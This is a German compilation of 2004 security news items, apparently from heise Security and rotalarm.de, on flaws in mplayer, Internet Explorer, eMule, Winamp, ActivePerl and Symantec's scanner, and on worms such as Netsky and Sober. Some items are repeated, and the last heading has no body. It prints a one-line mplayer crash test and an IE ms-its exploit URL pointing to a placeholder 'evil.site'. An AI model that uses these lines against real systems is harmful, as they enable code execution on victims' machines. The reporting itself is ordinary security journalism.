Die Entwickler von mplayer haben den Fehler bestätigt. Betroffen sind die Versionen 0.90pre, 0.90rc, 0.90, 0.91, 1.0pre1, 1.0pre2 und 1.0pre3. Anwender sollten auf die neuen Versionen 1.0pre3try2 oder 0.92.1 wechseln. Alternativ steht ein Patch für alle fehlerhaften Versionen zur Verfügung. Ob der eigene mplayer verwundbar ist, können Benutzer mit folgender Zeile feststellen: $ mplayer http://`perl -e 'print "\""x1024;'` Fehlerhafte Versionen erzeugen nach Angaben des Entdeckers der Schwachstelle, ein Sicherheitsspezialist mit dem Pseudonym Blexim, einen Segmentation Fault.

http://www.rotalarm.de/
Angebliches Leck in Chat-Client mIRC verunsichert Anwender



[Entwarnung] (http://www.heise.de/newsticker/meldung/46030) Meldungen über eine angebliche Schwachstelle in mIRC 6.14, für die bereits ein Exploit verfügbar sein soll, verunsichern derzeit weltweit Anwender. Dabei soll sich ein Fehler in der Verarbeitung von DCC-Requests ausnutzen lassen, um beliebigen Code auf das System eines Opfers zu schleusen und auszuführen. Ein Patch für die Lücke sei nicht verfügbar.

Die Meldung hat sich allerdings mittlerweile als falsch herausgestellt. Laut mirc.net kursiert zwar zurzeit ein Exploit, dieser richte sich aber wohl gegen ein Skript eines Drittherstellers. Laut QuakeNet soll es dabei um ein "CTCP VERSION reply changer script" handeln. Nähere Angaben dazu sind derzeit nicht verfügbar.

Ursprung des Gerüchts war die E-Mail eines GameSurge-IRC-Operators an das CERT-IRC, der auf einen Exploit gegen mIRC 6.14 hinwies. Mehrere Netze, unter anderem QuakeNET, DALnet und Undernet, verbreiteten diese Meldung weiter, da die Quelle bislang als zuverlässig galt. Ein funktionierender Exploit war zuletzt im Oktober 2003 für die mIRC-Version 6.11 aufgetaucht, der eine Lücke bei DCC-Request ausnutzte und Clients zum Absturz brachte.


####

US-Sicherheitsexperten fordern bessere Ausbildung für Softwareentwickler



Die National Cyber Security Partnership (NCSP) fordert in ihrem aktuellem "Security Across the Software Development Life Cycle" eine bessere Ausbildung der Entwickler. Der Bericht befasst sich insbesondere mit dem Lebenzyklus von Software. Sicherheit müsse sich über die gesamte Lebensspanne eines Software-Produktes erstrecken. Jeder Abschnitt der Spanne, angefangen vom Design und Spezifikation, über die Implementierung und Tests bis hin zum Patch-Management soll unter den Gesichtspunkten der IT-Sicherheit bearbeitet werden.

Die Arbeitsgruppe hat zur Definition entsprechender Empfehlungen vier Untergruppen gebildet, die sich mit Schulung von Entwicklern und Anwendern, Softwareprozessen und Patchen beschäftigen. Die vierte Gruppe -- Incentive Subgroup -- will ein Programm erarbeiten, um Herstellern das Entwickeln von sicherer Software schmackhaft zu machen. Dazu sollen Preisverleihungen und Zertifizierungen gehören. Daneben stellt man auch die Idee vor, die Sicherheit einzelner Softwaremodule als Messlatte für die weitere Karriere der jeweiligen Entwickler heranzuziehen.

Die vergangenes Jahr gegründete Arbeitsgruppe hat sich die Verbesserung der Cyber Security der US-amerikanischen Informationsinfrastruktur zum Ziel gesetzt. Mitglieder sind diverse Sicherheitsexperten aus Forschung, Lehre und Industrie, sogar Vertreter der National Security Agency finden sich in der Gruppe. Die Vorsitzenden der Gruppe sind Ron Moritz von Computer Associates und Scott Charney von Microsoft. Ähnliche Ziele wie die NCSP verfolgen die Cyber Security Industry Alliance (CSIA) und der Global Council of CSOs

Siehe dazu auch:

• Report der National Cyber Security Partnership

http://www.heise.de/security/news/meldung/46241


####

Mit c't-Emailcheck den PC absichern



Mit MyDoom, Netsky und Bagle hat die Verbreitung von Computerschädlingen in den vergangenen Wochen eine neue Dimension erreicht. Der neue c't-Emailcheck zeigt, wo die Gefahren lauern und wie man sich schützt. Dort können Anwender nachschauen, ob das eigene System tatsächlich optimal eingerichtet ist. Diverse Test-Mails führen die Tricks der Viren vor und helfen dabei, die verwendeten Programme und das eigene Verhalten anzupassen. Zur Auswahl stehen unter anderem E-Mails mit JavaScript, Web-Bugs und diversen Dummy-Viren. Alle Test-Mails sind völlig harmlos und können keinen Schaden anrichten.

Für sicheres E-Mailen gelten vier Grundsätze: Man sollte niemals unangeforderte Dateianhänge öffnen, sein System immer auf dem aktuellen Stand halten, die Einstellungen des E-Mail-Programms überprüfen sowie ein regelmäßig aktualisiertes Antivirenprogramm einsetzen. "Unser Test von Antivirensoftware hat jedoch gezeigt, dass manche Hersteller länger als einen Tag brauchen, bis sie neue Viren erkennen", erläutert Jürgen Schmidt, Chefredakteur des Sicherheitsportals heise Security. In c't 8/2004 vergleicht ein Test von 18 Antivirenprogrammen die Reaktionszeiten der Hersteller. Das Heft liegt am kommenden Montag am Kiosk.

http://www.heise.de/security/news/meldung/46244


####

Gefälschte Inhalte auf Webserver des Bundesverbands der Phonographischen Wirtschaft



Durch einen Konfigurationsfehler des Webservers des Bundesverbands der Phonographischen Wirtschaft/IFPI -- www.ifpi.de -- war es bis gestern möglich, mit manipulierten URLs Inhalte fremder Seiten im Browser einzublenden. Dazu kursierte auch ein Link im Internet, der zwar auf die Seiten des Verbandes führte, aber einen Text mit der Überschrift: "IFPI erklärt sich solidarisch mit den Forderungen des Chaos Computer Club e.V. zum Thema *********** und befürwortet privaten Tausch von Musik zur Förderung der Phonobranche" anzeigte. Anders als die gefälschte Meldung vermuten lässt, geht die IFPI allerdings derzeit massiv gegen illegale Anbieter von Musik in Tauschbörsen vor.



Möglich war das Einbauen externer Inhalte durch den Zusatz "jumpURL" in der Pfadangabe: http://www.ifpi.de/index.htm?jumpUrl=regtemplate-yellow2.reg.tpDer externe Inhalt stammte von einem Server der Domain reg.tp, die allerdings nichts mit der Regulierungsbehörde für Telekommunikation und Post zu tun hat -- obwohl die Homepage täuschend echt nachgemacht ist. Durch die fehlende Filterung des Pfades war somit nicht nur der Aufruf lokaler Inhalte erlaubt. Eine Manipulation des Servers durch Dritte war dazu nicht notwendig. Der Fehler ist mittlerweile behoben.

http://www.heise.de/security/news/meldung/46245

Netsky.Q attackiert Tauschbörsen- und Crackerseiten



[Viren & Würmer] (http://www.heise.de/newsticker/meldung/46112) Aufgrund der starken Verbreitung des Wurms Netsky.Q alias W32.Netsky.Q@mm, W32/Netsky.Q@mm, W32/Netsky-Q, WORM_NETSKY.Q, Win32.Netsky.Q, I-Worm.NetSky.r haben die Hersteller von Antivirensoftware die Warnstufen erhöht. Zwischen dem 8. und 11. April startet er von infizierten Systemen eine Denial-of-Service-Attacke gegen www.edonkey2000.com, www.kazaa.com, www.emule-project.net, www.cracks.am und www.cracks.st. Zusätzlich begann er am 30.3. morgens ab 5.11 Uhr über den PC-Lautsprecher zu piepen. Wie Netsky.P nutzt er eine alte Lücke in ungepatchten Internet-Explorer-Versionen 5.01 und 5.5 aus, um den Mailanhang – in dem der Wurm steckt – automatisch auszuführen. Das allein erklärt aber nicht die erfolgreiche Verbreitung, da nur noch wenige Nutzer die alten Browserversionen einsetzen dürften. Offenbar klicken Anwender – trotz fast täglicher Viren- und Wurmwarnungen – munter weiter auf Attachments.

http://www.rotalarm.de/
IE wieder im Visier



[online/Browser/Email] Microsoft Internet Explorer MT-ITS Protocol Zone Bypass Vulnerability (http://www.heise.de/newsticker/meldung/46126) Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung. Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt IE eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet ms-its: mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des IE ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem.

http://www.rotalarm.de/
Sicherheitsloch in Linux Movie Player



[Linux] Exploitable remote buffer overflow vulnerability in the HTTP parser (http://www.heise.de/newsticker/meldung/46154) Ein Fehler im mplayer für Linux ermöglicht es Angreifern, eigenen Code in das System zu schleusen und mit den Rechten des angemeldeten Benutzers auszuführen. mplayer bietet die Möglichkeit, online Media-Dateien von einem Webserver zu laden und abzuspielen (HTTP Streaming Content). Die Schwachstelle beruht auf einem Fehler im HTTP-Header-Parser: Ein manipulierter Location-Header kann einen Heap Overflow provozieren. Um die Schwachstelle auszunutzen, muss ein Angreifer allerdings den Webserver unter seine Kontrolle gebracht haben beziehungsweise einen eigenen Server betreiben.

Die Entwickler von mplayer haben den Fehler bestätigt. Betroffen sind die Versionen 0.90pre, 0.90rc, 0.90, 0.91, 1.0pre1, 1.0pre2 und 1.0pre3. Anwender sollten auf die neuen Versionen 1.0pre3try2 oder 0.92.1 wechseln. Alternativ steht ein Patch für alle fehlerhaften Versionen zur Verfügung. Ob der eigene mplayer verwundbar ist, können Benutzer mit folgender Zeile feststellen: $ mplayer http://`perl -e 'print "\""x1024;'` Fehlerhafte Versionen erzeugen nach Angaben des Entdeckers der Schwachstelle, ein Sicherheitsspezialist mit dem Pseudonym Blexim, einen Segmentation Fault.

http://www.rotalarm.de/
Angebliches Leck in Chat-Client mIRC verunsichert Anwender



[Entwarnung] (http://www.heise.de/newsticker/meldung/46030) Meldungen über eine angebliche Schwachstelle in mIRC 6.14, für die bereits ein Exploit verfügbar sein soll, verunsichern derzeit weltweit Anwender. Dabei soll sich ein Fehler in der Verarbeitung von DCC-Requests ausnutzen lassen, um beliebigen Code auf das System eines Opfers zu schleusen und auszuführen. Ein Patch für die Lücke sei nicht verfügbar.

Die Meldung hat sich allerdings mittlerweile als falsch herausgestellt. Laut mirc.net kursiert zwar zurzeit ein Exploit, dieser richte sich aber wohl gegen ein Skript eines Drittherstellers. Laut QuakeNet soll es dabei um ein "CTCP VERSION reply changer script" handeln. Nähere Angaben dazu sind derzeit nicht verfügbar.

Ursprung des Gerüchts war die E-Mail eines GameSurge-IRC-Operators an das CERT-IRC, der auf einen Exploit gegen mIRC 6.14 hinwies. Mehrere Netze, unter anderem QuakeNET, DALnet und Undernet, verbreiteten diese Meldung weiter, da die Quelle bislang als zuverlässig galt. Ein funktionierender Exploit war zuletzt im Oktober 2003 für die mIRC-Version 6.11 aufgetaucht, der eine Lücke bei DCC-Request ausnutzte und Clients zum Absturz brachte.

http://www.rotalarm.de/

Wieder deutschsprachiger Wurm unterwegs



Anders als die Netsky- und Bagle-Varianten, die Anwender nur mit schnöden kurzen manchmal auch kryptischen englischen Texten auszutricksen versuchen, ist der neue Sober.F alias I-Worm.VB.c (Kaspersky) bilingual. In der Tradition seines Vorgängers Sober.c bietet er je nach Länderdomain englische oder deutsche Texte. Die Beschreibung auf der Symantec-Seite enthält Texte und Betreffzeilen aus gesichteten Mails. Die Hersteller von Antivirensoftware ordnen den Wurm derzeit erst in die Gefahrenstufe Low beziehungsweise 2 ein. Die Mail-Scanner-Statistik des Heise-Verlags weist allerdings allein für heute, den 4. April bereits über 1200 registrierte Samples auf.

Der Wurm verschickt sich selbst als Dateianhang mit gefälschtem Absender an Adressen, die er auf dem infizierten System gefunden hat. Sober.F nutzt keine Schwachstellen in Outlook Express oder dem Internet Explorer aus; zur Infektion ist ein Klick des Anwenders auf den Dateianhang notwendig. Der Wurm verfügt über keine Schadroutine, versucht aber Dateien aus dem Internet nachzuladen und auszuführen. Einige der gesichteten Mail-Samples des Wurm versuchten sogar vorzutäuschen, vom Virenschutz des jeweiligen Empfängers überprüft worden zu sein, indem sie einen Text mit der richtigen Domain des Anwenders anzeigten:

*** Anti- Virus: Es wurde kein Virus erkannt
*** Domainname Virenschutz
*** http://www.domainname.de


Insbesondere Anwender in Firmennetzen könnten fälschlicherweise glauben, die Mail sei vom Scanner des Unternehmens überprüft worden. Einige AVS-Hersteller haben ihre Signaturen schon aktualisiert. NAI und Symantec gehören leider noch nicht dazu; sie planen erst für den 7. April ein Update. Weitere Hinweise zum Schutz vor Viren und Würmern finden Sie auf den Antivirus-Seiten von heise Security.

Update
Mittlerweile warnt auch das Bundesamt für Sicherheit in der Informationstechnik vor Sober.F. Symantec hat (4.April, 19.00 Uhr) seine Signaturen aktualisiert und die Warnstufe von 2 auf 3 erhöht. Der Wurm scheint sich derzeit stark zu verbreiten. Ob man von einem Ausbruch reden kann, wird der Wochenanfang zeigen. Administratoren sollten die Auto-Notification ihrer Mailscanner abschalten, um nicht zusätzlich Netzlast zu erzeugen. Die Notifications kommen ohnehin bei den Falschen an.
Auch NAI hat mittlerweile nachgezogen und den Threat-Level auf Medium erhöht sowie neue Signaturen zu Verfügung gestellt.



Siehe dazu auch:

• Wurm-Beschreibung des BSI auf heise Security
• Wurm-Beschreibung von Symantec
• Wurm-Beschreibung von NAI

http://www.heise.de/security/news/meldung/46276


####

Netsky.Q attackiert Tauschbörsen- und Crackerseiten



[Viren & Würmer] (http://www.heise.de/newsticker/meldung/46112) Aufgrund der starken Verbreitung des Wurms Netsky.Q alias W32.Netsky.Q@mm, W32/Netsky.Q@mm, W32/Netsky-Q, WORM_NETSKY.Q, Win32.Netsky.Q, I-Worm.NetSky.r haben die Hersteller von Antivirensoftware die Warnstufen erhöht. Zwischen dem 8. und 11. April startet er von infizierten Systemen eine Denial-of-Service-Attacke gegen www.edonkey2000.com, www.kazaa.com, www.emule-project.net, www.cracks.am und www.cracks.st. Zusätzlich begann er am 30.3. morgens ab 5.11 Uhr über den PC-Lautsprecher zu piepen. Wie Netsky.P nutzt er eine alte Lücke in ungepatchten Internet-Explorer-Versionen 5.01 und 5.5 aus, um den Mailanhang – in dem der Wurm steckt – automatisch auszuführen. Das allein erklärt aber nicht die erfolgreiche Verbreitung, da nur noch wenige Nutzer die alten Browserversionen einsetzen dürften. Offenbar klicken Anwender – trotz fast täglicher Viren- und Wurmwarnungen – munter weiter auf Attachments.

http://www.rotalarm.de/
IE wieder im Visier



[online/Browser/Email] Microsoft Internet Explorer MT-ITS Protocol Zone Bypass Vulnerability (http://www.heise.de/newsticker/meldung/46126) Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung. Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt IE eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet ms-its: mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des IE ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem.

http://www.rotalarm.de/
Sicherheitsloch in Linux Movie Player



[Linux] Exploitable remote buffer overflow vulnerability in the HTTP parser (http://www.heise.de/newsticker/meldung/46154) Ein Fehler im mplayer für Linux ermöglicht es Angreifern, eigenen Code in das System zu schleusen und mit den Rechten des angemeldeten Benutzers auszuführen. mplayer bietet die Möglichkeit, online Media-Dateien von einem Webserver zu laden und abzuspielen (HTTP Streaming Content). Die Schwachstelle beruht auf einem Fehler im HTTP-Header-Parser: Ein manipulierter Location-Header kann einen Heap Overflow provozieren. Um die Schwachstelle auszunutzen, muss ein Angreifer allerdings den Webserver unter seine Kontrolle gebracht haben beziehungsweise einen eigenen Server betreiben.

Die Entwickler von mplayer haben den Fehler bestätigt. Betroffen sind die Versionen 0.90pre, 0.90rc, 0.90, 0.91, 1.0pre1, 1.0pre2 und 1.0pre3. Anwender sollten auf die neuen Versionen 1.0pre3try2 oder 0.92.1 wechseln. Alternativ steht ein Patch für alle fehlerhaften Versionen zur Verfügung. Ob der eigene mplayer verwundbar ist, können Benutzer mit folgender Zeile feststellen: $ mplayer http://`perl -e 'print "\""x1024;'` Fehlerhafte Versionen erzeugen nach Angaben des Entdeckers der Schwachstelle, ein Sicherheitsspezialist mit dem Pseudonym Blexim, einen Segmentation Fault.

http://www.rotalarm.de/
Angebliches Leck in Chat-Client mIRC verunsichert Anwender



[Entwarnung] (http://www.heise.de/newsticker/meldung/46030) Meldungen über eine angebliche Schwachstelle in mIRC 6.14, für die bereits ein Exploit verfügbar sein soll, verunsichern derzeit weltweit Anwender. Dabei soll sich ein Fehler in der Verarbeitung von DCC-Requests ausnutzen lassen, um beliebigen Code auf das System eines Opfers zu schleusen und auszuführen. Ein Patch für die Lücke sei nicht verfügbar.

Die Meldung hat sich allerdings mittlerweile als falsch herausgestellt. Laut mirc.net kursiert zwar zurzeit ein Exploit, dieser richte sich aber wohl gegen ein Skript eines Drittherstellers. Laut QuakeNet soll es dabei um ein "CTCP VERSION reply changer script" handeln. Nähere Angaben dazu sind derzeit nicht verfügbar.

Ursprung des Gerüchts war die E-Mail eines GameSurge-IRC-Operators an das CERT-IRC, der auf einen Exploit gegen mIRC 6.14 hinwies. Mehrere Netze, unter anderem QuakeNET, DALnet und Undernet, verbreiteten diese Meldung weiter, da die Quelle bislang als zuverlässig galt. Ein funktionierender Exploit war zuletzt im Oktober 2003 für die mIRC-Version 6.11 aufgetaucht, der eine Lücke bei DCC-Request ausnutzte und Clients zum Absturz brachte.

http://www.rotalarm.de/
#####
Sicherheitsloch in P2P-Client eMule



Der Tauschbörsen-Client eMule für eDonkey enthält ein Sicherheitsloch, mit dem ein Angreifer über das Netzwerk eigenen Code auf ein verwundbares System schleusen und im Kontext des Anwenders ausführen kann. Schuld ist ein Fehler in der Funktion DecodeBase16() zur Dekodierung von hexadezimalen Zeichenketten, wie sie unter anderem im integrierten Webserver- und IRC-Client-Code Einsatz finden. Zu lange Strings, etwa im SENDLINK-Kommando für IRC, provozieren eine Buffer Overflow.

Ein Proof-of-Concept-Exploit ist im Security Advisory von Kostya Kortchinsky aufgeführt. Betroffen sind alle Versionen bis einschließlich 0.42.d. Die Entwickler haben die fehlerbereinigte Version 0.42e zum Download bereitgestellt. Als Workaround sollten Anwender den Webserver und IRC-Client nicht benutzen.



Siehe dazu auch:

• Security Advisory auf Full Disclosure

http://www.heise.de/security/news/meldung/46284



####

Virenscanner löste Fehlalarm beim Besuch von Freenet aus



Für Verwirrung sorgt seit dem Wochenende die Warnung des Virenscanners von H+BEDV beim Besuch der Seiten von Freenet.de. Beim Laden der index.html erkannte Antivir fälschlicherweise den Trojaner TR/Script.JS.Now.2 und schob die Datei in die Quarantäne. Erste Vermutungen betroffener Internet-Nutzer, der Server von Freenet sei eventuell geknackt worden, bestätigten sich nicht. Schuld ist stattdessen eine von H+BEDV am 4. April herausgegebene fehlerhafte Signatur, die ein Javascript in der HTML-Datei als bösartigen Code identifiziert (False Positive). Anwendern soll Freenet als Workaround das Abschalten des Scanners empfohlen haben.

Betroffen sind die freie und die kommerziellen Versionen des Virenscanners Antivir von H+BEDV. Der Hersteller hat das Problem gegenüber heise Security bestätigt und mittlerweile eine korrigierte Signatur zur Verfügung gestellt.

Siehe dazu auch:

• Forum zum Fehlalarm auf Freenet

http://www.heise.de/security/news/meldung/46282


####

Unautorisierte Datenbankzugriffe auf Webservern durch Dreamweaver-Skripte



Macromedia hat ein Security Advisory veröffentlicht, in dem der Hersteller auf einen Fehler in Dreamweavers Datenbankskripten für dynamische Webseiten hinweist. Für Testzwecke installiert Dreamweaver eigene Skripte auf Webservern, um über das Netzwerk auf die Datenbank zuzugreifen. Der Treiber auf dem Server lässt sich dabei über HTTP abfragen und konfigurieren. Leider kann ein Angreifer ebenfalls das Skript aufrufen und so genannte Data Source Names (DSNs) abfragen sowie eigene Kommandos an die Datenbank übergeben, wenn diese nicht Passwort-geschützt ist.

Besonders kritisch ist dieses Problem für öffentlich zugängliche Web-Server, auf denen vergessen wurde die Skripte zu löschen. Betroffen sind alle Versionen von Dreamweaver MX 2004, MX und UltraDev 4. Macromedia stuft das Problem als kritisch ein und empfiehlt Anwendern die entsprechenden Skripte sofort von den Servern zu entfernen. Entsprechende Hinweise zur sicheren Konfiguration von entfernten Datenbankzugriffen gibt Macromedia in dem Advisory Security implications of remote database connectivity



Siehe dazu auch:

• Security Advisory von Macromedia

http://www.heise.de/security/news/meldung/46288

Wurm legt Seite der Musikindustrie lahm



[Hacks & Incidents] (http://enterprisesecurity.symantec.de/symes612.cfm?JID=3&PID=10416651) Der Internetauftritt des Verbands der US-Musikindustrie RIAA war ab dem 17. März für mehrere Tage nicht erreichbar.

Offensichtlich hielten die RIAA-Server der anhaltenden DDoS-Attacke durch den Wurm MyDoom.F alias W32.Mydoom.F@mm, W32/Mydoom.f@MM, WORM_MYDOOM.F, W32/MyDoom-F, I-Worm.Mydoom.f, Win32.Mydoom.F nicht stand. Die Betreiber beschlossen Medienberichten zufolge daraufhin den Umstieg auf Linux. Seitens der Musikindustrie gibt es bislang keine Stellungnahme zu den Vorfällen, außer der Bestätigung, dass der Internet-Auftritt tagelang offline war.

http://www.rotalarm.de/
eMule – Pufferüberlauf in DecodeBase16()



[online/Browser/Email] (http://www.tecchannel.de/sicherheit/reports/2542.html) Kostya Kortchinsky meldet eine Schwachstelle in eMule, über die ein Angreifer das System kompromittieren kann. Die Sicherheitslücke beruht auf einem Begrenzungsfehler in der Funktion DecodeBase16(), die vom Web-Server und dem IRC-Client zur Dekodierung hexadezimaler Zeichenfolgen genutzt wird.

Dadurch kann der Angreifer einen Pufferüberlauf verursachen, indem er beispielsweise ein speziell aufgebautes IRC-SendLink-Kommando an das Opfer schickt. Ein erfolgreicher Angriff ermöglicht das Ausführen beliebigen Codes auf dem System. Die Sicherheitslücke ist bestätigt für Version v0.42d. Frühere Versionen könnten jedoch ebenfalls betroffen sein. Aktualisieren Sie auf Version 0.42e.

http://www.rotalarm.de/

######

Heap Overflow in Winamp ermöglicht Ausführen von beliebigem Code



Das Plug-in "in_mod.dll" des Mediaplayers Winamp enthält einen Fehler, mit dem ein Angreifer beim Laden von Fasttracker-2-Media-Dateien (.xm - Extended MOD) eigenen Code auf verwundbare Systeme schleusen und im Sicherheitskontext des Anwenders ausführen kann. Laut Security Advisory des Sicherheitsdienstleisters NGSSecurity lässt sich aufgrund einer fehlerhaften Längenabfrage ein Heap Overflow provozieren, mit dem sich die Kontrolle über Winamp gewinnen lässt, um weiteren Code zu laden und zu starten.

Ein Anwender muss dazu aber eine manipulierte xm-Datei öffnen. Allerdings kann dies auch automatisch beim Besuch einer Webseite geschehen, wenn solche Dateien als Objekte im HTML-Code eingebettet sind. Da das fehlerhafte Plug-in auch andere Media-Typen unterstützt, lässt sich nach Angaben von NGSSecurity der Fehler auch mit Dateien anderer Endungen provozieren.

Betroffen sind Winamp 2.91 bis einschließlich 5.02. Eventuell sind auch ältere Versionen verwundbar, was NGSS aber nicht getestet hat. In Version 5.03 ist der Fehler behoben. Alternativ können Anwender auch die Fasttracker-2-Unterstützung unter /Options/Preferences/Plug-ins/Input/Nullsoft Module Decoder/Fasttracker 2 deaktivieren.



Siehe dazu auch:

• Security Advisory von NGSSecurity

http://www.heise.de/security/news/meldung/46310

####

Sicherheitslücke in Perl für Windows



In den Perl-Implementierungen für Windows von ActiveState (ActivePerl) und Larry Wall ist ein Fehler in der Funktion win32_stat enthalten. Dadurch lässt sich beliebiger Code auf den Stack eines Systems schreiben und ausführen, berichtet der Sicherheitsdienstleister iDEFENSE. Ursache des Fehlers ist ein Buffer Overflow, der durch einen zu langen Dateinamen bei der Übergabe an die Funktion provoziert wird. win32_stat() dient zur Abfrage von Dateiinformationen und ist ein Wrapper auf die Funktion stat().

Ist die fehlerhafte Funktion in Skripten auf Webservern enthalten und die Übergabe von Benutzereingaben möglich, so kann ein Angreifer das System über das Netzwerk kompromittieren. Betroffen sind alle Versionen von Perl für Win32 bis einschließlich 5.8.3. Der Fehler soll in Version 5.8.4 behoben sein, die aber noch nicht zur Verfügung steht.



Siehe dazu auch:

• Security Advisory von iDEFENSE

http://www.heise.de/security/news/meldung/46317

F-Secures Anti-Virus für MIMEsweeper erkennt Sober.D nicht



Nach Angaben der Sicherheitsdatenbank Secunia arbeitet F-Secures Anti-Virus for MIMEsweeper fehlerhaft, sodass Schädlinge in Mails nicht immer vom Scanner erkannt werden. Aufgefallen war das Problem bei ZIP-Archiven, in denen der Wurm Sober.D steckte. Nähere Angaben macht Secunia zu dem Fehler nicht. Betroffen sind die Versionen 5.41 und 5.42 auf allen Plattformen. Der Hersteller hält einen Hotfix auf seinem FTP-Server bereit.



Siehe dazu auch:

• Security Advisory von Secunia

http://www.heise.de/security/news/meldung/46320


###

Apple veröffentlicht Sicherheits-Updates für Mac OS X



Apple hat zwei Sicherheits-Updates für sein Unix-Betriebssystem Mac OS X freigegeben. Das Update 2004-04-05 gibt es in Varianten für Mac OS X ab Version 10.3.3 sowie ab 10.2.8. Die beiden Pakete sind sowohl für die Client- als auch für die Server-Variante der jeweiligen Mac-OS-X-Versionen geeignet, außerdem stehen sie für alle Landessprachen bereit, in denen Mac OS X zu haben ist.

Das Security-Update 2004-04-05 (10.3.3) korrigiert die Komponenten CUPS (Drucksystem), libxml2, die Mail-Anwendung sowie die Verschlüsselungsbibliotheken für Internet-Verbindungen OpenSSL. Das Update 2004-04-05 (10.2.8) korrigiert CUPS unter Mac OS X 10.2.8. und enthält zusätzlich das Paket 2004-01-26.

Beide Updates sind neben dem Einzel-Download über Apples Support-Seite auch über die Funktion zur Software-Aktualisierung des Betriebssystems zu bekommen. Die Informationsseite zu den Security-Updates in der Knowledge-Base hat Apple noch nicht aktualisiert, sie ist noch auf dem Stand des Security Update 2004-02-23.

http://www.heise.de/security/news/meldung/46325


#####


Report: Wurm Lovsan nicht schuld an Blackout 2003



Eine amerikanisch-kanadische Untersuchungskommission der Energieaufsichtsbehörde (FERC) ist zu dem Ergebnis gekommen, dass der Wurm Lovsan/MSBlaster nicht der Verursacher des gigantischen Stromausfalls im Nordosten der USA im vergangenen Jahr war. Beim Blackout 2003 waren 50 Millionen Amerikaner zeitweise ohne Strom. Da zeitgleich der Wurm im Internet die Runde machte und Millionen von Windows-Rechnern infizierte oder lahmlegte, lag der Schluss nahe, Lovsan könne zum Ausfall beigetragen haben. Immerhin greifen Energieerzeuger schon seit längerem auf Windows für ihre Managementsysteme zurück.

Im Februar dieses Jahres wurde aber bekannt, dass ein Softwarefehler eines Unix-Systems zur Überwachung und Steuerung von Stromnetzen beim Erzeuger FirstEnergy den Ausfall begünstigte. Durch den Fehler wurden Alarme und Meldungen nicht mehr an das Kontrollpersonal weitergeleitet. Damit war es nicht mehr möglich, Gegenmaßnahmen zu ergreifen: Der Ausfall einer Versorgungsleitung führte zum Zusammenbruch des gesamten Stromverbundes.

Der Fehler des Managementsystems sei aber laut Untersuchungsbericht weder auf Cyberattacken durch Al-Quaida noch durch Würmer oder Viren zurückzuführen. Grundlage der Ermittlungen waren Befragungen von Mitarbeitern, Telefonmitschnitte und Berichte von Behörden und Geheimdiensten. Allerdings habe man nicht die Logdateien von Netzwerkgeräten, Firewalls und Intrusion-Detection-Systemen ausgewertet, die eventuell tiefergehende Hinweise gegeben hätten.

Siehe dazu auch:

• Vollständiger Untersuchungsbericht des FERC
• Software-Fehler verursachte US-Stromausfall 2003 auf heise Security
• War der Wurm drin? auf heise Security
• Doch ein Zusammenhang zwischen Blackout und Windows-Wurm? auf heise Security
• SQL-Slammer beeinträchtigte US-Kraftwerksteuerung auf heise Security
• Blaster and the August 14th Blackout von Bruce Schneier

http://www.heise.de/security/news/meldung/46328


#####

Buffer Overflow in Symantecs Online-Virenscanner



In Symantecs ActiveX-Control des kostenlosen Online-Virenscanners "Symantec Security Check -- Virus Detection" ist ein Fehler enthalten, der einen Buffer Overflow provozieren kann und damit das Control zum Absturz bringt. Prinzipiell ist ein Angreifer damit auch in der Lage, beliebigen Code auf den Stack des Systems zu schreiben und im Kontext des Anwenders auszuführen.

Zum Scannen eines Windows-Rechners installiert der Dienst das Control "rufsi.dll", das drei Objekte registriert: Symantec.SymVAFileQuery.1, Symantec.SymVARegQuery1 und Symantec.SymUtility1. Im ersten Objekt prüft die Funktion "GetPrivateProfileString" die Länge einer übergebenen Zeichenkette (Dateinamen) nicht richtig. Extrem lange Strings -- mit mehr als 740.000 Zeichen -- führen dann zum Pufferüberlauf. Der Fehler lässt sich sowohl lokal als auch über eine manipulierte Webseite ausnutzen.

Der Entdecker der Sicherheitslücke -- Rafel Ivgi -- hat in einem Security Advisory ein Proof-of-Concept-Exploit veröffentlicht. Im heise-Security-Labor führte die Demo auf PCs mit verwundbaren ActiveX-Control zum Absturz der "rufsi.dll". Symantec hat bislang noch nicht reagiert. Anwender sollten das verwundbare Control "rufsi.dll" unter C:\Windows\Downloaded Program Files\ deinstallieren und ActiveX deaktivieren.

Mit der Problematik unsicherer ActiveX-Controls befasst sich auch der aktuelle Kommentar auf heise Security: (Un-)Sicheres ActiveX, die Xte



Siehe dazu auch:

• Security Advisory von Rafel Ivgi

http://www.heise.de/security/news/meldung/46354


###

McAfees und Pandas Online-Virenscanner ebenfalls fehlerhaft



